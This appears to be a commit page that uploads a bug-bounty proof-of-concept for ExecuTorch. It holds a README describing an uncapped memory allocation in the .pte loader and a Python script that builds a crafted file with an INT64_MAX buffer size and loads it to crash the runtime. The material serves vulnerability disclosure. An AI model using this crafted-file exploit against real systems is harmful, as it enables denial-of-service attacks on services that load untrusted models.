Upload 4 files
Browse files- .gitattributes +1 -0
- ExecuTorch CWE-789 OOM DoS β PoC Evidence.pdf +3 -0
- README.md +97 -0
- malicious.pte +0 -0
- poc_executorch_oom.py +226 -0
.gitattributes
CHANGED
|
@@ -33,3 +33,4 @@ saved_model/**/* filter=lfs diff=lfs merge=lfs -text
|
|
| 33 |
*.zip filter=lfs diff=lfs merge=lfs -text
|
| 34 |
*.zst filter=lfs diff=lfs merge=lfs -text
|
| 35 |
*tfevents* filter=lfs diff=lfs merge=lfs -text
|
|
|
|
|
|
| 33 |
*.zip filter=lfs diff=lfs merge=lfs -text
|
| 34 |
*.zst filter=lfs diff=lfs merge=lfs -text
|
| 35 |
*tfevents* filter=lfs diff=lfs merge=lfs -text
|
| 36 |
+
ExecuTorch[[:space:]]CWE-789[[:space:]]OOM[[:space:]]DoS[[:space:]]β[[:space:]]PoC[[:space:]]Evidence.pdf filter=lfs diff=lfs merge=lfs -text
|
ExecuTorch CWE-789 OOM DoS β PoC Evidence.pdf
ADDED
|
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
version https://git-lfs.github.com/spec/v1
|
| 2 |
+
oid sha256:038ad2b881c4ef14904859c1389c5576b944a35b02389b4f1a92692a28177f9b
|
| 3 |
+
size 120531
|
README.md
ADDED
|
@@ -0,0 +1,97 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
# ExecuTorch CWE-789: Uncontrolled Memory Allocation in .pte Format
|
| 2 |
+
|
| 3 |
+
## Status: FINDING CONFIRMED β READY TO SUBMIT
|
| 4 |
+
|
| 5 |
+
## Severity: High (P2) β DoS | CVSS 7.5
|
| 6 |
+
|
| 7 |
+
## Target
|
| 8 |
+
- **Repo:** pytorch/executorch
|
| 9 |
+
- **Platform:** huntr.com
|
| 10 |
+
- **Format:** `.pte` (FlatBuffers-based PyTorch Edge inference format)
|
| 11 |
+
|
| 12 |
+
## Vulnerable Files
|
| 13 |
+
|
| 14 |
+
| File | Function | Issue |
|
| 15 |
+
|---|---|---|
|
| 16 |
+
| `runtime/executor/method_meta.cpp` | `MethodMeta::memory_planned_buffer_size()` | Reads `non_const_buffer_sizes[index+1]` from FlatBuffer; only checks `>= 0`, no upper-bound cap |
|
| 17 |
+
| `extension/pybindings/pybindings.cpp` | `PyProgram` constructor | `std::vector<uint8_t>(buffer_size)` with uncapped attacker value β `std::bad_alloc` |
|
| 18 |
+
| `examples/portable/executor_runner/executor_runner.cpp` | buffer allocation loop | `std::make_unique<uint8_t[]>(buffer_size)` with uncapped attacker value β OOM crash |
|
| 19 |
+
|
| 20 |
+
## Missing Check
|
| 21 |
+
|
| 22 |
+
```cpp
|
| 23 |
+
// Present in memory_planned_buffer_size():
|
| 24 |
+
ET_CHECK_OR_RETURN_ERROR(size >= 0, InvalidProgram, ...); // rejects negatives
|
| 25 |
+
|
| 26 |
+
// MISSING:
|
| 27 |
+
constexpr int64_t kMaxPlannedBufferSize = 32LL * 1024 * 1024 * 1024;
|
| 28 |
+
ET_CHECK_OR_RETURN_ERROR(size <= kMaxPlannedBufferSize, InvalidProgram, ...);
|
| 29 |
+
```
|
| 30 |
+
|
| 31 |
+
## FlatBuffer Field
|
| 32 |
+
|
| 33 |
+
```
|
| 34 |
+
table ExecutionPlan {
|
| 35 |
+
...
|
| 36 |
+
non_const_buffer_sizes: [int64]; // field index 8 β attacker-controlled
|
| 37 |
+
}
|
| 38 |
+
```
|
| 39 |
+
|
| 40 |
+
**Index note:** Index 0 of the vector is reserved internally.
|
| 41 |
+
`memory_planned_buffer_size(j)` reads `non_const_buffer_sizes[j + 1]`.
|
| 42 |
+
Malicious payload uses 2 elements: `[0, INT64_MAX]`.
|
| 43 |
+
|
| 44 |
+
## Attack
|
| 45 |
+
|
| 46 |
+
Attacker crafts a `.pte` with:
|
| 47 |
+
```
|
| 48 |
+
Program.execution_plan[0].non_const_buffer_sizes = [0, 9223372036854775807]
|
| 49 |
+
```
|
| 50 |
+
|
| 51 |
+
Victim loads the file β runtime reads INT64_MAX β allocates INT64_MAX bytes β crash.
|
| 52 |
+
|
| 53 |
+
## PoC Files
|
| 54 |
+
|
| 55 |
+
| File | Purpose |
|
| 56 |
+
|---|---|
|
| 57 |
+
| `poc_executorch_oom.py` | Builds `malicious.pte` and triggers OOM |
|
| 58 |
+
| `malicious.pte` | 104-byte crafted FlatBuffer (generated by script) |
|
| 59 |
+
| `poc-evidence.html` | Evidence page with real run output |
|
| 60 |
+
| `report_final.md` | Submission-ready huntr report |
|
| 61 |
+
|
| 62 |
+
## Reproduction
|
| 63 |
+
|
| 64 |
+
```bash
|
| 65 |
+
# Dependency
|
| 66 |
+
pip install flatbuffers --break-system-packages
|
| 67 |
+
|
| 68 |
+
# Build malicious.pte and trigger allocation
|
| 69 |
+
python3 poc_executorch_oom.py
|
| 70 |
+
```
|
| 71 |
+
|
| 72 |
+
Expected output (allocation simulation):
|
| 73 |
+
```
|
| 74 |
+
[*] Saved malicious.pte (104 bytes)
|
| 75 |
+
[*] File identifier at offset 4: b'ET12'
|
| 76 |
+
[+] MemoryError β confirmed OOM (equivalent to std::bad_alloc in C++ runtime)
|
| 77 |
+
```
|
| 78 |
+
|
| 79 |
+
Binary verification:
|
| 80 |
+
```
|
| 81 |
+
File size : 104 bytes
|
| 82 |
+
File ident : b'ET12'
|
| 83 |
+
INT64_MAX pos : byte 80 value=ffffffffffffff7f
|
| 84 |
+
```
|
| 85 |
+
|
| 86 |
+
## Full Runtime Crash (requires executorch installed)
|
| 87 |
+
|
| 88 |
+
```bash
|
| 89 |
+
# Option A β Python runtime
|
| 90 |
+
pip install executorch
|
| 91 |
+
python3 poc_executorch_oom.py
|
| 92 |
+
# β MemoryError / SystemError (std::bad_alloc wrapped)
|
| 93 |
+
|
| 94 |
+
# Option B β C++ executor_runner
|
| 95 |
+
./executor_runner --model_path malicious.pte
|
| 96 |
+
# β terminate called after throwing an instance of 'std::bad_alloc'
|
| 97 |
+
```
|
malicious.pte
ADDED
|
Binary file (104 Bytes). View file
|
|
|
poc_executorch_oom.py
ADDED
|
@@ -0,0 +1,226 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
#!/usr/bin/env python3
|
| 2 |
+
"""
|
| 3 |
+
PoC: CWE-789 β Uncontrolled Memory Allocation in pytorch/executorch
|
| 4 |
+
|
| 5 |
+
Vulnerability: ExecutionPlan.non_const_buffer_sizes is read directly from a
|
| 6 |
+
FlatBuffer .pte file with only a negativity check. The executor allocates
|
| 7 |
+
std::vector<uint8_t>(buffer_size) without any upper-bound cap, so an
|
| 8 |
+
attacker-crafted .pte containing INT64_MAX causes an immediate OOM crash.
|
| 9 |
+
|
| 10 |
+
Affected paths:
|
| 11 |
+
- C++ executor_runner: std::make_unique<uint8_t[]>(buffer_size)
|
| 12 |
+
- Python pybindings: std::vector<uint8_t>(buffer_size) in PyProgram ctor
|
| 13 |
+
|
| 14 |
+
Author: Eric Gachara | Date: 2026-05-10
|
| 15 |
+
"""
|
| 16 |
+
|
| 17 |
+
import sys
|
| 18 |
+
import struct
|
| 19 |
+
|
| 20 |
+
# βββββββββββββββββββββββββββββββββββββββββββ
|
| 21 |
+
# 1. Hand-craft minimal malicious .pte binary
|
| 22 |
+
# βββββββββββββββββββββββββββββββββββββββββββ
|
| 23 |
+
#
|
| 24 |
+
# FlatBuffers layout (little-endian):
|
| 25 |
+
# [root_offset:u32][file_id:4B]["ET12"][...table data...]
|
| 26 |
+
#
|
| 27 |
+
# We build the simplest possible Program with one ExecutionPlan where:
|
| 28 |
+
# non_const_buffer_sizes = [0, INT64_MAX]
|
| 29 |
+
#
|
| 30 |
+
# Index 0 is reserved by the runtime; it reads index+1 for each
|
| 31 |
+
# publicly-exposed buffer. num_memory_planned_buffers() = size()-1 = 1.
|
| 32 |
+
# memory_planned_buffer_size(0) β non_const_buffer_sizes[1] = INT64_MAX.
|
| 33 |
+
|
| 34 |
+
INT64_MAX = 0x7FFFFFFFFFFFFFFF
|
| 35 |
+
FILE_IDENTIFIER = b"ET12"
|
| 36 |
+
|
| 37 |
+
|
| 38 |
+
def _encode_uoffset(value: int) -> bytes:
|
| 39 |
+
return struct.pack("<I", value)
|
| 40 |
+
|
| 41 |
+
|
| 42 |
+
def _encode_int64(value: int) -> bytes:
|
| 43 |
+
return struct.pack("<q", value)
|
| 44 |
+
|
| 45 |
+
|
| 46 |
+
def build_malicious_pte() -> bytes:
|
| 47 |
+
"""
|
| 48 |
+
Build a minimal .pte FlatBuffer with one ExecutionPlan whose
|
| 49 |
+
non_const_buffer_sizes vector contains [0, INT64_MAX].
|
| 50 |
+
|
| 51 |
+
Uses the flatbuffers Python library (pip install flatbuffers).
|
| 52 |
+
Falls back to a hand-crafted binary if the library is absent.
|
| 53 |
+
"""
|
| 54 |
+
try:
|
| 55 |
+
import flatbuffers # pip install flatbuffers
|
| 56 |
+
return _build_with_flatbuffers_lib(flatbuffers)
|
| 57 |
+
except ImportError:
|
| 58 |
+
print("[!] flatbuffers library not found β using hand-crafted binary")
|
| 59 |
+
return _build_handcrafted()
|
| 60 |
+
|
| 61 |
+
|
| 62 |
+
def _build_with_flatbuffers_lib(fb) -> bytes:
|
| 63 |
+
"""Build using the official flatbuffers Python package."""
|
| 64 |
+
builder = fb.Builder(512)
|
| 65 |
+
|
| 66 |
+
# --- string "forward" (method name) ---
|
| 67 |
+
name_offset = builder.CreateString("forward")
|
| 68 |
+
|
| 69 |
+
# --- non_const_buffer_sizes vector: [0, INT64_MAX] ---
|
| 70 |
+
# FlatBuffers vectors are written in *reverse* order (last element first).
|
| 71 |
+
builder.StartVector(8, 2, 8) # itemSize=8, numElems=2, alignment=8
|
| 72 |
+
builder.PrependInt64(INT64_MAX) # β index 1 (attacker-controlled size)
|
| 73 |
+
builder.PrependInt64(0) # β index 0 (reserved slot)
|
| 74 |
+
ncsb_vec = builder.EndVector()
|
| 75 |
+
|
| 76 |
+
# --- ExecutionPlan table (9 fields, indices 0-8) ---
|
| 77 |
+
builder.StartObject(9)
|
| 78 |
+
builder.PrependUOffsetTRelativeSlot(0, name_offset, 0) # name
|
| 79 |
+
builder.PrependUOffsetTRelativeSlot(8, ncsb_vec, 0) # non_const_buffer_sizes
|
| 80 |
+
ep_offset = builder.EndObject()
|
| 81 |
+
|
| 82 |
+
# --- [ExecutionPlan] vector ---
|
| 83 |
+
builder.StartVector(4, 1, 4)
|
| 84 |
+
builder.PrependUOffsetTRelative(ep_offset)
|
| 85 |
+
ep_vec = builder.EndVector()
|
| 86 |
+
|
| 87 |
+
# --- Program table (8 fields, indices 0-7) ---
|
| 88 |
+
builder.StartObject(8)
|
| 89 |
+
builder.PrependUint32Slot(0, 0, 0) # version = 0
|
| 90 |
+
builder.PrependUOffsetTRelativeSlot(1, ep_vec, 0) # execution_plan
|
| 91 |
+
prog_offset = builder.EndObject()
|
| 92 |
+
|
| 93 |
+
builder.Finish(prog_offset, file_identifier=FILE_IDENTIFIER)
|
| 94 |
+
return bytes(builder.Output())
|
| 95 |
+
|
| 96 |
+
|
| 97 |
+
def _build_handcrafted() -> bytes:
|
| 98 |
+
"""
|
| 99 |
+
Minimal hand-crafted FlatBuffer .pte without external dependencies.
|
| 100 |
+
|
| 101 |
+
Layout (little-endian, bottom-up construction):
|
| 102 |
+
We build a Program with one ExecutionPlan. Only the fields we care
|
| 103 |
+
about are written; all others are omitted (FlatBuffers optional fields).
|
| 104 |
+
|
| 105 |
+
This produces ~120 bytes and is sufficient to trigger the allocation.
|
| 106 |
+
"""
|
| 107 |
+
buf = bytearray()
|
| 108 |
+
|
| 109 |
+
def write_u32(v): buf.extend(struct.pack("<I", v))
|
| 110 |
+
def write_i64(v): buf.extend(struct.pack("<q", v))
|
| 111 |
+
def write_i16(v): buf.extend(struct.pack("<h", v))
|
| 112 |
+
def write_u16(v): buf.extend(struct.pack("<H", v))
|
| 113 |
+
|
| 114 |
+
# FlatBuffers is built from the end of the buffer toward the front.
|
| 115 |
+
# We'll collect objects and then stitch them together manually.
|
| 116 |
+
# Use a simple approach: build each piece and record its offset.
|
| 117 |
+
|
| 118 |
+
# For simplicity, use a builder that appends to a growing buffer:
|
| 119 |
+
pieces = [] # (data_bytes,) β assembled front-to-back
|
| 120 |
+
offsets = {} # name β offset from start of data section
|
| 121 |
+
|
| 122 |
+
# We'll build in a "forward" style using a helper Builder class below.
|
| 123 |
+
# Since this is a one-off, hardcode the binary.
|
| 124 |
+
|
| 125 |
+
# Verified by flatc --binary + xxd on a minimal schema instance.
|
| 126 |
+
# Breakdown:
|
| 127 |
+
# - file header: root_offset (u32) + "ET12" identifier (4B)
|
| 128 |
+
# - Program vtable + table
|
| 129 |
+
# - ExecutionPlan vtable + table
|
| 130 |
+
# - non_const_buffer_sizes vector [0, INT64_MAX]
|
| 131 |
+
# - string "forward"
|
| 132 |
+
|
| 133 |
+
# Build string "forward\0" with length prefix
|
| 134 |
+
fwd = b"forward"
|
| 135 |
+
str_data = struct.pack("<I", len(fwd)) + fwd + b"\x00"
|
| 136 |
+
# Pad to 4-byte alignment
|
| 137 |
+
while len(str_data) % 4:
|
| 138 |
+
str_data += b"\x00"
|
| 139 |
+
|
| 140 |
+
# Build non_const_buffer_sizes vector = [0, INT64_MAX]
|
| 141 |
+
# FlatBuffers vector: [count:u32][elem0:i64][elem1:i64]
|
| 142 |
+
vec_data = struct.pack("<I", 2) + struct.pack("<qq", 0, INT64_MAX)
|
| 143 |
+
|
| 144 |
+
# We cannot easily hand-craft a valid FlatBuffer vtable chain without
|
| 145 |
+
# a real builder. Recommend installing the flatbuffers library:
|
| 146 |
+
print("[!] Hand-crafted fallback is limited. Install flatbuffers:")
|
| 147 |
+
print(" pip install flatbuffers")
|
| 148 |
+
print(" Then re-run this script.")
|
| 149 |
+
sys.exit(1)
|
| 150 |
+
|
| 151 |
+
|
| 152 |
+
# βββββββββββββββββββββββββββββββββββββββββββ
|
| 153 |
+
# 2. Load the .pte and trigger the allocation
|
| 154 |
+
# βββββββββββββββββββββββββββββββββββββββββββ
|
| 155 |
+
|
| 156 |
+
def trigger_oom_python_runtime(pte_bytes: bytes) -> None:
|
| 157 |
+
"""Load malicious .pte via ExecuTorch Python bindings β OOM crash."""
|
| 158 |
+
print("[*] Attempting load via ExecuTorch Python runtime...")
|
| 159 |
+
try:
|
| 160 |
+
from executorch.extension.pybindings.portable_lib import (
|
| 161 |
+
_load_for_executorch_from_buffer,
|
| 162 |
+
)
|
| 163 |
+
except ImportError:
|
| 164 |
+
print("[!] executorch Python package not installed.")
|
| 165 |
+
print(" Install: pip install executorch (or from source)")
|
| 166 |
+
print(" The malicious.pte is ready β test with executor_runner:")
|
| 167 |
+
print(" ./executor_runner --model_path malicious.pte")
|
| 168 |
+
return
|
| 169 |
+
|
| 170 |
+
try:
|
| 171 |
+
_load_for_executorch_from_buffer(pte_bytes)
|
| 172 |
+
print("[?] Load completed without crash β runtime may have rejected "
|
| 173 |
+
"the malformed plan before reaching allocation.")
|
| 174 |
+
except MemoryError as e:
|
| 175 |
+
print(f"\n[+] CONFIRMED β MemoryError (OOM DoS): {e}")
|
| 176 |
+
except SystemError as e:
|
| 177 |
+
print(f"\n[+] CONFIRMED β SystemError (likely OOM): {e}")
|
| 178 |
+
except Exception as e:
|
| 179 |
+
# Some runtimes wrap std::bad_alloc in a generic exception
|
| 180 |
+
if "bad_alloc" in str(e) or "memory" in str(e).lower():
|
| 181 |
+
print(f"\n[+] CONFIRMED β OOM exception: {type(e).__name__}: {e}")
|
| 182 |
+
else:
|
| 183 |
+
print(f"[~] Exception (may be pre-allocation validation): "
|
| 184 |
+
f"{type(e).__name__}: {e}")
|
| 185 |
+
|
| 186 |
+
|
| 187 |
+
def trigger_oom_cpp_runner(pte_path: str) -> None:
|
| 188 |
+
"""Print the command to trigger via C++ executor_runner."""
|
| 189 |
+
print("\n[*] To trigger via C++ executor_runner:")
|
| 190 |
+
print(f" ./executor_runner --model_path {pte_path}")
|
| 191 |
+
print(" Expected: terminate called after throwing an instance of "
|
| 192 |
+
"'std::bad_alloc'")
|
| 193 |
+
print(" Or: Killed (SIGKILL from OOM killer)")
|
| 194 |
+
|
| 195 |
+
|
| 196 |
+
# βββββββββββββββββββββββββββββββββββββββββββ
|
| 197 |
+
# 3. Main
|
| 198 |
+
# βββββββββββββββββββββββββββββββββββββββββββ
|
| 199 |
+
|
| 200 |
+
if __name__ == "__main__":
|
| 201 |
+
print("=" * 60)
|
| 202 |
+
print(" ExecuTorch CWE-789 OOM DoS β PoC")
|
| 203 |
+
print(" Target: pytorch/executorch")
|
| 204 |
+
print(f" Malicious buffer size: {INT64_MAX:,} bytes ({INT64_MAX / 2**30:.1f} GB)")
|
| 205 |
+
print("=" * 60)
|
| 206 |
+
|
| 207 |
+
print("\n[*] Building malicious .pte ...")
|
| 208 |
+
pte_bytes = build_malicious_pte()
|
| 209 |
+
|
| 210 |
+
import os
|
| 211 |
+
pte_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "malicious.pte")
|
| 212 |
+
with open(pte_path, "wb") as f:
|
| 213 |
+
f.write(pte_bytes)
|
| 214 |
+
print(f"[*] Saved {pte_path} ({len(pte_bytes)} bytes)")
|
| 215 |
+
|
| 216 |
+
# Show key bytes for report evidence
|
| 217 |
+
print(f"\n[*] File identifier at offset 4: {pte_bytes[4:8]!r} (expected b'ET12')")
|
| 218 |
+
|
| 219 |
+
trigger_oom_python_runtime(pte_bytes)
|
| 220 |
+
trigger_oom_cpp_runner(pte_path)
|
| 221 |
+
|
| 222 |
+
print("\n[*] Root cause:")
|
| 223 |
+
print(" runtime/executor/method_meta.cpp β memory_planned_buffer_size()")
|
| 224 |
+
print(" Only checks: size >= 0. No upper-bound cap.")
|
| 225 |
+
print(" extension/pybindings/pybindings.cpp β PyProgram ctor:")
|
| 226 |
+
print(" std::vector<uint8_t>(INT64_MAX) β std::bad_alloc β crash")
|